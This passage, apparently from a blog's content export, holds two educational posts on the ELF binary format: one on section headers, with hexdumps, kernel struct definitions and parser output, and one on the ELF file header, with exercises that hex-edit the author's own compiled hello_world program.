000039e8: d300 0000 0e00 0000 0300 0000 0000 0000 d03d 0000 0000 0000 d02d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 00003a28: df00 0000 0f00 0000 0300 0000 0000 0000 d83d 0000 0000 0000 d82d 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................=.......-...................................... 00003a68: eb00 0000 0600 0000 0300 0000 0000 0000 e03d 0000 0000 0000 e02d 0000 0000 0000 e001 0000 0000 0000 0700 0000 0000 0000 0800 0000 0000 0000 1000 0000 0000 0000 .................=.......-...................................... 00003aa8: f400 0000 0100 0000 0300 0000 0000 0000 c03f 0000 0000 0000 c02f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 00003ae8: f900 0000 0100 0000 0300 0000 0000 0000 e83f 0000 0000 0000 e82f 0000 0000 0000 2800 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0800 0000 0000 0000 .................?......./......(............................... 00003b28: 0201 0000 0100 0000 0300 0000 0000 0000 1040 0000 0000 0000 1030 0000 0000 0000 1d00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 .................@.......0...................................... 00003b68: 0801 0000 0800 0000 0300 0000 0000 0000 2d40 0000 0000 0000 2d30 0000 0000 0000 0300 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................-@......-0...................................... 00003ba8: 0d01 0000 0100 0000 3000 0000 0000 0000 0000 0000 0000 0000 2d30 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0100 0000 0000 0000 ........0...............-0...................................... 
00003be8: 0100 0000 0200 0000 0000 0000 0000 0000 0000 0000 0000 0000 4830 0000 0000 0000 7002 0000 0000 0000 1c00 0000 0600 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........................H0......p............................... 00003c28: 0900 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 b832 0000 0000 0000 5301 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................2......S............................... 00003c68: 1100 0000 0300 0000 0000 0000 0000 0000 0000 0000 0000 0000 0b34 0000 0000 0000 1601 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 .........................4...................................... With each line presenting itself as a section header entry, it\u0026rsquo;s like experiencing an elegant and straightforward design! Now we just have to map each of these lines to Elf64_Shdr (since we have a 64Bit file)\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L321 */ typedef struct elf64_shdr { Elf64_Word sh_name;\t/* Section name, index in string tbl # 4 bytes */ Elf64_Word sh_type;\t/* Type of section # 4 bytes */ Elf64_Xword sh_flags;\t/* Miscellaneous section attributes # 8 bytes */ Elf64_Addr sh_addr;\t/* Section virtual addr at execution # 8 bytes */ Elf64_Off sh_offset;\t/* Section file offset # 8 bytes */ Elf64_Xword sh_size;\t/* Size of section in bytes # 8 bytes */ Elf64_Word sh_link;\t/* Index of another section # 4 bytes */ Elf64_Word sh_info;\t/* Additional section information # 4 bytes */ Elf64_Xword sh_addralign;\t/* Section alignment # 8 bytes */ Elf64_Xword sh_entsize;\t/* Entry size if section holds table # 8 bytes */ } Elf64_Shdr; But first, understand why we are doing any of this\u0026hellip;\nSection headers Imagine a LEGO batmobile – it\u0026rsquo;s not just one big block, right? It has different parts, like a roof, doors, wheels, etc. ELF sections (not section headers) are like these parts in a computer program. 
Each section has its own job: some sections hold the variables, some hold the program instructions, while some just hold extra notes. Basically, each section has some data in it and has a specific role for that data.\nSection headers are like an index for those sections. They tell you a good amount of detail about each section, like\nName of the section (indirectly :P), Type of section, Address in memory and offset in the file, Size of the section in bytes, etc Now you know what section headers are and the valuable data they contain, and the ELF file header acts as our treasure map, directing us to the precise location of the section headers in the file (e_shoff), detailing their entry size (e_shentsize) and counting their entries (e_shnum).\nI\u0026rsquo;ve also whipped up a nifty little parser, just for the occasion. It\u0026rsquo;s designed to gracefully dissect an ELF file and lay out the section headers in a more digestible and user-friendly fashion. No more cryptic hexdumps or xxd outputs for us!\n[ + ] Section headers begins at: 0x34b8 [ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 [ 01 ] Section Name: .interp Type: 0x1 Flags: 0x2 Addr: 0x318 Offset: 0x318 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 02 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x338 Offset: 0x338 Size: 64 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 03 ] Section Name: .note.gnu.build-id Type: 0x7 Flags: 0x2 Addr: 0x378 Offset: 0x378 Size: 36 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 04 ] Section Name: .note.ABI-tag Type: 0x7 Flags: 0x2 Addr: 0x39c Offset: 0x39c Size: 32 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 05 ] Section Name: .gnu.hash Type: 0xfff6 Flags: 0x2 Addr: 0x3c0 Offset: 0x3c0 Size: 28 Link: 6 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 06 ] Section Name: .dynsym Type: 0xb Flags: 0x2 Addr: 0x3e0 Offset: 0x3e0 Size: 168 Link: 7 Info: 0x1 Addralign: 0x8 Entsize: 24 [ 07 ] 
Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x488 Offset: 0x488 Size: 144 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 08 ] Section Name: .gnu.version Type: 0xffff Flags: 0x2 Addr: 0x518 Offset: 0x518 Size: 14 Link: 6 Info: 0x0 Addralign: 0x2 Entsize: 2 [ 09 ] Section Name: .gnu.version_r Type: 0xfffe Flags: 0x2 Addr: 0x528 Offset: 0x528 Size: 48 Link: 7 Info: 0x1 Addralign: 0x8 Entsize: 0 [ 10 ] Section Name: .rela.dyn Type: 0x4 Flags: 0x2 Addr: 0x558 Offset: 0x558 Size: 192 Link: 6 Info: 0x0 Addralign: 0x8 Entsize: 24 [ 11 ] Section Name: .rela.plt Type: 0x4 Flags: 0x42 Addr: 0x618 Offset: 0x618 Size: 24 Link: 6 Info: 0x17 Addralign: 0x8 Entsize: 24 [ 12 ] Section Name: .init Type: 0x1 Flags: 0x6 Addr: 0x1000 Offset: 0x1000 Size: 27 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 13 ] Section Name: .plt Type: 0x1 Flags: 0x6 Addr: 0x1020 Offset: 0x1020 Size: 32 Link: 0 Info: 0x0 Addralign: 0x10 Entsize: 16 [ 14 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x1040 Offset: 0x1040 Size: 315 Link: 0 Info: 0x0 Addralign: 0x10 Entsize: 0 [ 15 ] Section Name: .fini Type: 0x1 Flags: 0x6 Addr: 0x117c Offset: 0x117c Size: 13 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 16 ] Section Name: .rodata Type: 0x1 Flags: 0x2 Addr: 0x2000 Offset: 0x2000 Size: 18 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 17 ] Section Name: .eh_frame_hdr Type: 0x1 Flags: 0x2 Addr: 0x2014 Offset: 0x2014 Size: 36 Link: 0 Info: 0x0 Addralign: 0x4 Entsize: 0 [ 18 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x2038 Offset: 0x2038 Size: 124 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 19 ] Section Name: .init_array Type: 0xe Flags: 0x3 Addr: 0x3dd0 Offset: 0x2dd0 Size: 8 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 20 ] Section Name: .fini_array Type: 0xf Flags: 0x3 Addr: 0x3dd8 Offset: 0x2dd8 Size: 8 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 21 ] Section Name: .dynamic Type: 0x6 Flags: 0x3 Addr: 0x3de0 Offset: 0x2de0 Size: 480 Link: 7 Info: 0x0 Addralign: 0x8 Entsize: 16 [ 22 ] 
Section Name: .got Type: 0x1 Flags: 0x3 Addr: 0x3fc0 Offset: 0x2fc0 Size: 40 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 23 ] Section Name: .got.plt Type: 0x1 Flags: 0x3 Addr: 0x3fe8 Offset: 0x2fe8 Size: 32 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 8 [ 24 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x4008 Offset: 0x3008 Size: 16 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 25 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x4018 Offset: 0x3018 Size: 8 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 26 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0x3018 Size: 27 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 [ 27 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x3038 Size: 576 Link: 28 Info: 0x6 Addralign: 0x8 Entsize: 24 [ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3278 Size: 298 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x33a2 Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Here\u0026rsquo;s a sneak peek at what my trusty parser churned out, for your reference. (If you fancy, you can even pit it against the xxd results we saw earlier).\nNow, it\u0026rsquo;s time to take a deep dive into the inner workings of the Elf64_Shdr struct\n1. sh_name As I mentioned earlier, among so many sections of an ELF file, there\u0026rsquo;s one special place known as the string table. In this mystical realm, the names of all sections are held in a null-terminated fashion, creating a seamless string of section names. Now, the sh_name member, well, it\u0026rsquo;s like a treasure map, pinpointing the exact offset within that section. So, if, for instance, .interp resides at X1 bytes within the section, and this section itself is tucked away at Y1 bytes into the file, the location of this string can be calculated as simply X1 + Y1 bytes into the file. 
But, for the sake of simplicity, sh_name keeps things straightforward by storing just the X1 value, and nothing more. To track down the string table section\u0026rsquo;s exact location, we can rely on the trusty e_shstrndx value from the ELF file header.\nFrom a programming point of view, accessing the string value for a section name will look something like this (assuming a hypothetical pointer named base that points to the start of the file contents in memory) -\n(char*)base + shdr[ehdr-\u0026gt;e_shstrndx].sh_offset + shdr[i].sh_name 2. sh_type This member serves as a delightful teaser, offering a glimpse of the treasures awaiting inside the section itself. Take, for instance, SHT_STRTAB (0x3), a section that houses a collection of null-terminated strings, just waiting to be discovered.\nWhen we journey into the Linux kernel, we encounter a bunch of defined section header types -\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L271 */ /* sh_type */ #define SHT_NULL 0 #define SHT_PROGBITS 1 #define SHT_SYMTAB 2 #define SHT_STRTAB 3 #define SHT_RELA 4 #define SHT_HASH 5 #define SHT_DYNAMIC 6 #define SHT_NOTE 7 #define SHT_NOBITS 8 #define SHT_REL 9 #define SHT_SHLIB 10 #define SHT_DYNSYM 11 #define SHT_NUM 12 #define SHT_LOPROC 0x70000000 #define SHT_HIPROC 0x7fffffff #define SHT_LOUSER 0x80000000 #define SHT_HIUSER 0xffffffff 3. sh_flags This is a set of one-bit flags, each of which decides whether a specific feature applies to the given section or not\u0026hellip; The Linux kernel has some flag types defined -\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L290 */ /* sh_flags */ #define SHF_WRITE 0x1 #define SHF_ALLOC 0x2 #define SHF_EXECINSTR 0x4 #define SHF_RELA_LIVEPATCH 0x00100000 #define SHF_RO_AFTER_INIT 0x00200000 #define SHF_MASKPROC 0xf0000000 Playing the guessing game? Well, if you spot a section like .text with a flags value of 0x6 (SHF_ALLOC | SHF_EXECINSTR), it\u0026rsquo;s a hint at what\u0026rsquo;s to come. 
This section will be allocated a space in memory at runtime, with permission to execute instructions, but don\u0026rsquo;t even think about writing anything to it after the section is loaded.\n4. sh_addr Now, if the section is destined for memory, this member plays a pivotal role, holding the keys to the memory kingdom, designating the precise spot where the section lands. But here\u0026rsquo;s a twist – for sections with no memory aspirations, this value becomes a mere placeholder, leaving a little room for some extra, secret bytes. (wink, wink)\n5. sh_offset Here\u0026rsquo;s the catch: while sh_addr spills the beans on the section\u0026rsquo;s memory location, this member focuses on the section\u0026rsquo;s spot in the file. It\u0026rsquo;s like knowing where the script lies before the performance. However, some sections, like the enigmatic SHT_NOBITS, are a bit of a puzzle – they claim a spot in the file, but when you try to read data from their supposed location, it\u0026rsquo;s like chasing a ghost; there\u0026rsquo;s nothing substantial to be found. (that is, they don\u0026rsquo;t take any space in the file; like a classic \u0026ldquo;all bark, no bite\u0026rdquo; scenario)\n(HINT: Look at the offsets and sizes of the .bss and .comment sections in the above listing. .bss is a SHT_NOBITS kind of section.)\n6. sh_size For sections that aren\u0026rsquo;t the enigmatic SHT_NOBITS type, this value is a trustworthy measure, mapping out the precise size (in bytes) of the section within the file. For SHT_NOBITS, it\u0026rsquo;s a bit of a riddle: the .bss section in the listing above claims a size of 8 bytes, but since there is nothing in the file, that is the size the section will occupy in memory, not on disk.\n7. sh_link This member is used to link a section with another section. One use for this kind of linking is to signify some sort of dependency of one section on another. 
But the actual nature of linking depends on the section type.\n(HINT: Check out the .gnu.hash, .dynsym, and .dynstr sections)\n8. sh_info Think of this member as the mysterious vault, holding extra information that\u0026rsquo;s tailor-made for the section\u0026rsquo;s needs. However, the contents of this vault are shapeshifters, and what you\u0026rsquo;ll find inside depends entirely on the section\u0026rsquo;s unique personality and type.\n9. sh_addralign This member holds the alignment information. When it takes on the humble value of 0 or 1, it\u0026rsquo;s like saying, \u0026ldquo;No alignment required.\u0026rdquo; But when it strides into the realm of positive powers of 2, it becomes the architect of alignment, ensuring that the section is perfectly orchestrated for maximum efficiency.\nAlignment is the unsung hero in the world of efficient computing. It\u0026rsquo;s the magic behind how smoothly a computer can access and manipulate data or instructions.\n10. sh_entsize Picture it: there are sections that harbor orderly tables with entries of a fixed size. Now, this member is your trusted guide, revealing the size of each entry in bytes. To find the grand total of entries, you simply divide the section\u0026rsquo;s size by the size of each entry, just like a mathematical maestro. For example, .dynsym in the listing above is 168 bytes with 24-byte entries, so it holds 168 / 24 = 7 entries.\n(NOTE: You can read more about ELF sections and each member of section headers from man 5 elf; RTFM)\nPracticals For now, let\u0026rsquo;s just start with what the strip command does to ELF sections. 
And research on why section headers are actually important.\nIf you are more inclined towards being tech savvy, try to write a program to parse and display the section headers.\nTo go an extra mile, add a new section to your ELF file (also add it\u0026rsquo;s entry in section headers)\u0026hellip;\nHere are some links that might give you a starting point.\nhttps://stackoverflow.com/questions/1088128/adding-section-to-elf-file https://reverseengineering.stackexchange.com/questions/14779/how-to-successfully-add-a-code-section-to-an-executable-file-in-linux https://stackoverflow.com/questions/29058016/efficiently-adding-a-new-section-in-an-elf-file Conclusion Alright, buckle up, because we\u0026rsquo;ve just taken a deep dive into the wild world of ELF section headers! Picture this -\n┌───────────────────────────┐ │ │ │ File Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ Program Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 1 │ │ │ ├───────────────────────────┤ │ Section 2 │ ├───────────────────────────┤ │ │ │ Section 3 │ ├───────────────────────────┤ │ │ │ │ │ │ │ │ │ │ │ Section 4 │ │ │ │ │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 5 │ │ │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section 6 │ │ │ │ │ ├───────────────────────────┤ │ │ │ │ │ Section Header │ │ │ │ │ └───────────────────────────┘ Think of sections as pieces of a puzzle, each unique in size and placed at different offsets within the file. But fear not, for the section headers play the role of meticulous architects, documenting these diverse sections\u0026rsquo; whereabouts and characteristics. 
They\u0026rsquo;re the cool blueprints that grant us insight into the entire file\u0026rsquo;s layout and functionality.\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-section-headers/","summary":"Intro Assuming you\u0026rsquo;ve got ELF headers like Elf64_Ehdr or Elf32_Ehdr at your fingertips, and you\u0026rsquo;re armed with the know-how and tools to decipher their contents effortlessly.\nFor this article I\u0026rsquo;ll be using the below C code to generate the ELF file.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } You can get the ELF binary by compiling this code.","title":"ELF Chronicles: Section Headers (2/?)"},{"content":"Hexdumps In the fascinating world of computers, we\u0026rsquo;re stuck conversing in binary, a rather dull language of just ones and zeros. But because we mere humans love things to be a tad more exciting and concise, we\u0026rsquo;ve come up with our own nifty number system - \u0026ldquo;hexadecimal\u0026rdquo; or \u0026ldquo;hex\u0026rdquo; for short. This system ditches the binary bore and adds a touch of flair with 16 snazzy symbols. It\u0026rsquo;s got your usual digits from 0 to 9, plus those fancy A to F letters to make data a bit more, well, hexadecimal-chic!\nNow, let\u0026rsquo;s take a gander at this binary enigma, a message that only the most extraordinary folks can decipher with ease:\n011010000110010101101100011011000110111100001010 For us ordinary humans, this is a bit like deciphering alien hieroglyphics. 
So, we follow a procedure to unravel the secrets hidden within.\nStep one involves breaking down the binary data into byte-sized chunks, each containing 8 bits:\n01101000 01100101 01101100 01101100 01101111 00001010 Now, we embark on the magical journey of converting each chunk into its hexadecimal form. The legendary figures of the past might have used pen and paper, but in our tech-savvy era, we turn to tools like CyberChef.\nNo matter your chosen method, the result remains the same:\n68 65 6c 6c 6f 0a The binary code\u0026rsquo;s cryptic riddle got a facelift, and voilà! We now have this friendly hexadecimal version. It\u0026rsquo;s just what the doctor ordered for us humans to have a casual chat with the binary data, no sweat!\nFrom Code to Binary Let\u0026rsquo;s go on a journey that turns elegant C code into a mysterious binary blob, a language of ones and zeros that only computers understand. (** coughs compilation **)\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } After compiling the above C code we get an ELF (Executable and Linkable Format) file. (Compilation command - gcc hello_world.c -o hello_world)\nThis generated file, at its core, is nothing more than a delightful binary blob. It\u0026rsquo;s the computer\u0026rsquo;s secret handshake, speaking directly in ones and zeros, no pleasantries.
And the icing on the cake is that we mere humans, with our clever programming prowess, can craft tools to translate this binary jargon into friendly hexadecimal, or we can simply cozy up to good ol\u0026rsquo; hexdump and xxd for the job. Whichever suits your fancy, we\u0026rsquo;ve got options!\nELF Header Here\u0026rsquo;s a snapshot of the first 64 bytes in the compiled binary file:\n# In binary representation ❯ xxd -b -l 64 ./hello_world 00000000: 01111111 01000101 01001100 01000110 00000010 00000001 .ELF.. 00000006: 00000001 00000000 00000000 00000000 00000000 00000000 ...... 0000000c: 00000000 00000000 00000000 00000000 00000011 00000000 ...... 00000012: 00111110 00000000 00000001 00000000 00000000 00000000 \u0026gt;..... 00000018: 01010000 00010000 00000000 00000000 00000000 00000000 P..... 0000001e: 00000000 00000000 01000000 00000000 00000000 00000000 ..@... 00000024: 00000000 00000000 00000000 00000000 00101000 00110101 ....(5 0000002a: 00000000 00000000 00000000 00000000 00000000 00000000 ...... 00000030: 00000000 00000000 00000000 00000000 01000000 00000000 ....@. 00000036: 00111000 00000000 00001101 00000000 01000000 00000000 8...@. 0000003c: 00011110 00000000 00011101 00000000 .... # In hex representation ❯ xxd -l 64 ./hello_world 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ 00000010: 0300 3e00 0100 0000 5010 0000 0000 0000 ..\u0026gt;.....P....... 00000020: 4000 0000 0000 0000 2835 0000 0000 0000 @.......(5...... 00000030: 0000 0000 4000 3800 0d00 4000 1e00 1d00 ....@.8...@..... Now, you may wonder, what on earth does this mean? Well, these intriguing bytes are like puzzle pieces, and depending on the machine type, they map to specific structures in the Linux kernel. 
Our quest, quite simply, is to unravel this digital enigma and shed light on the code\u0026rsquo;s purpose.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L207 */ #define EI_NIDENT\t16 typedef struct elf32_hdr { unsigned char\te_ident[EI_NIDENT]; Elf32_Half\te_type; Elf32_Half\te_machine; Elf32_Word\te_version; Elf32_Addr\te_entry; /* Entry point */ Elf32_Off\te_phoff; Elf32_Off\te_shoff; Elf32_Word\te_flags; Elf32_Half\te_ehsize; Elf32_Half\te_phentsize; Elf32_Half\te_phnum; Elf32_Half\te_shentsize; Elf32_Half\te_shnum; Elf32_Half\te_shstrndx; } Elf32_Ehdr; typedef struct elf64_hdr { unsigned char\te_ident[EI_NIDENT];\t/* ELF \u0026#34;magic number\u0026#34; */ Elf64_Half e_type; Elf64_Half e_machine; Elf64_Word e_version; Elf64_Addr e_entry;\t/* Entry point virtual address */ Elf64_Off e_phoff;\t/* Program header table file offset */ Elf64_Off e_shoff;\t/* Section header table file offset */ Elf64_Word e_flags; Elf64_Half e_ehsize; Elf64_Half e_phentsize; Elf64_Half e_phnum; Elf64_Half e_shentsize; Elf64_Half e_shnum; Elf64_Half e_shstrndx; } Elf64_Ehdr; Since I\u0026rsquo;m on a 64 bit system, I\u0026rsquo;ll use Elf64_Ehdr to show what each byte in the above data chunk represents.\n❯ xxd -l 64 ./hello_world 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ 00000010: 0300 3e00 0100 0000 5010 0000 0000 0000 ..\u0026gt;.....P....... 00000020: 4000 0000 0000 0000 2835 0000 0000 0000 @.......(5...... 00000030: 0000 0000 4000 3800 0d00 4000 1e00 1d00 ....@.8...@..... 
// After mapping the linux ELF struct to the above data e_ident[16] = 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 e_type = 03 00 e_machine = 3e 00 e_version = 01 00 00 00 e_entry = 50 10 00 00 00 00 00 00 e_phoff = 40 00 00 00 00 00 00 00 e_shoff = 28 35 00 00 00 00 00 00 e_flags = 00 00 00 00 e_ehsize = 40 00 e_phentsize = 38 00 e_phnum = 0d 00 e_shentsize = 40 00 e_shnum = 1e 00 e_shstrndx = 1d 00 Shall we dissect each of these mysterious members in the struct?\n1. e_ident[EI_NIDENT] The first 16 bytes of the ELF header are collectively referred to as the \u0026ldquo;ident\u0026rdquo; or \u0026ldquo;identification\u0026rdquo; field. It includes a magic number and various identification information. Here is a table that tells more about what all identification information is present in it.\ne_ident[16] = 7f45 4c46 0201 0100 0000 0000 0000 0000 EI_MAG0 = 7f EI_MAG1 = 45 (E) EI_MAG2 = 4c (L) EI_MAG3 = 46 (F) EI_CLASS = 02 EI_DATA = 01 EI_VERSION = 01 EI_OSABI = 00 EI_ABIVERSION = 00 EI_PAD = 00 0000 0000 0000 Ah, you might wonder, \u0026ldquo;How on earth do I know this?\u0026rdquo; Well, my friend, it\u0026rsquo;s a detective game we play, and our magnifying glass is the kernel source code.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L334 */ #define\tEI_MAG0\t0\t/* e_ident[] indexes */ #define\tEI_MAG1\t1 #define\tEI_MAG2\t2 #define\tEI_MAG3\t3 #define\tEI_CLASS\t4 /* 1=32Bit; 2=64Bit */ #define\tEI_DATA\t5 /* Endianness ==\u0026gt; 1=Little; 2=Big */ #define\tEI_VERSION\t6 /* ELF header version */ #define\tEI_OSABI\t7 /* OS ABI ==\u0026gt; 0=None(same as SysV); 3=Linux */ #define\tEI_PAD\t8 /* Starting of padding - currently unused */ ==\u0026gt; This information tells me that my ELF binary is a 64-Bit (EI_CLASS = 02), Little endian (EI_DATA = 01) binary.\n2. 
e_type This member tells what type of ELF file it is.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L69 */ #define ET_NONE 0 // No file type #define ET_REL 1 #define ET_EXEC 2 #define ET_DYN 3 #define ET_CORE 4 #define ET_LOPROC 0xff00 // Processor-specific #define ET_HIPROC 0xffff // Processor-specific Since my binary is little endian, e_type = 03 00 should be read as e_type = 00 03. That tells me that I\u0026rsquo;ve a ET_DYN type of file.\n3. e_machine This member tells us about the target architecture for the file. In linux kernel uapi, there is a complete header file dedicated for target machines.\nFor my binary file, machine type is 3e (e_machine = 3e 00; Should be read as 00 3e).\n(Integer representation of 3e is 62)\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf-em.h#L31 */ #define EM_X86_64\t62\t/* AMD x86-64 */ 4. e_version This member specifies the version of the ELF file. This is different from the EI_VERSION which tells only about the ELF header version.\nFor my binary file, version is 1 (remember, to convert the value to little endian)\nThese are the versions defined in linux kernel uapi header\n#define EV_NONE\t0\t/* e_version, EI_VERSION */ #define EV_CURRENT\t1 #define EV_NUM\t2 5. e_entry This member is quite interesting. This tells about the virtual/memory address where program execution begins. This is the starting point of the program.\nYou might think, \u0026ldquo;Aha, this must always point to the main() function!\u0026rdquo; Well, here\u0026rsquo;s a plot twist for you!\nFor my binary file, the entry point is 1050 (e_entry = 50 10 00 00 00 00 00 00).\nAccording to our trusty objdump, this value does not point to the main function but points to the _start function. (..which in turn executes the main function. Here is an article that explains this.)\n❯ objdump -D --disassembler-options=intel hello_world | grep -i \u0026#34;1050\u0026#34; 0000000000001050 \u0026lt;_start\u0026gt;: 6. 
e_phoff This is the program header offset: the position in the ELF file where the program header table starts.\n7. e_shoff Just like e_phoff, this member stores the file offset of the section header table.\n8. e_flags This member provides processor-specific flags associated with the file.\n9. e_ehsize This member tells the size of the ELF header. For my binary, the value of this member is 0x40 (64 in decimal). Now you can guess why I started by analyzing the first 64 bytes of the file.\n10. e_phentsize This is the size of each entry in the program header table.\n11. e_phnum This is the count of entries in the program header table.\n12. e_shentsize This is the size of each entry in the section header table.\n13. e_shnum This is the count of entries in the section header table.\n14. e_shstrndx Now, this little guy is what we call the \u0026ldquo;Section string index\u0026rdquo;. It is the index of the section header entry that describes the section name string table, which holds the names of all the sections.\n(We\u0026rsquo;ll talk more about section headers and program headers in later articles.)\nPracticals How to edit a binary file? If you think it through, you just need a program that can read/write binary data and convert that data to hex for us to view. You can build your own tool to do this or you can use other tools that can already do this.\nI would like to propose my favorite - vim + xxd\nHere are the steps to it.\nOpen the file in vim in binary mode (use -b flag) vim -b argv_printer Pass the data to xxd (you can also use the additional flags that xxd supports) Press : to go into command mode then type %!xxd -c 1 to pass the binary data through this command.
:%!xxd -c 1 Edit the hex values you want (just like you would edit any other text file, press i and go on) Reverse the hex to binary Go to command mode again by pressing : then type %!xxd -r :%!xxd -r Now save and quit the vim editor If you don\u0026rsquo;t know steps for that consider learning vim first or, use another hex editor Change the ELF magic number Open the file with vim and edit the EI_MAG part. # Before 00000000: 7f . 00000001: 45 E 00000002: 4c L 00000003: 46 F # After 00000000: 7f . 00000001: 48 E 00000002: 45 L 00000003: 58 F Note that I\u0026rsquo;ve only changed the hex values and not the ascii values for it.\nrevert the hex to binary data (:%!xxd -r) write and quit vim (I\u0026rsquo;m still not telling you the command) analyze it ❯ ./hello_world zsh: exec format error: ./hello_world ❯ readelf --file-header --wide hello_world readelf: Error: Not an ELF file - it has the wrong magic bytes at the start The reason for this behaviour is written in kernel code.\n/* https://elixir.bootlin.com/linux/v6.5.7/source/include/uapi/linux/elf.h#L348 */ #define\tELFMAG\t\u0026#34;\\177ELF\u0026#34; #define\tSELFMAG\t4 /* https://elixir.bootlin.com/linux/v6.5.7/source/fs/binfmt_elf.c#L848 */ retval = -ENOEXEC; if (memcmp(elf_ex-\u0026gt;e_ident, ELFMAG, SELFMAG) != 0) goto out; Change the executable class (64 bit -\u0026gt; 32 bit) Open the file with vim and edit the EI_CLASS part. # Before 00000004: 02 . # After 00000004: 01 . revert the hex to binary data (:%!xxd -r) write and quit vim (I\u0026rsquo;m still not telling you the command) analyze it # Runs perfectly fine ❯ ./hello_world Hello World1 Hello World2 Hello World3 # file command tells another tale ❯ file hello_world hello_world: ELF 32-bit LSB pie executable, x86-64, version 1 (SYSV), no program header, no section header This is clearly a parsing problem. 
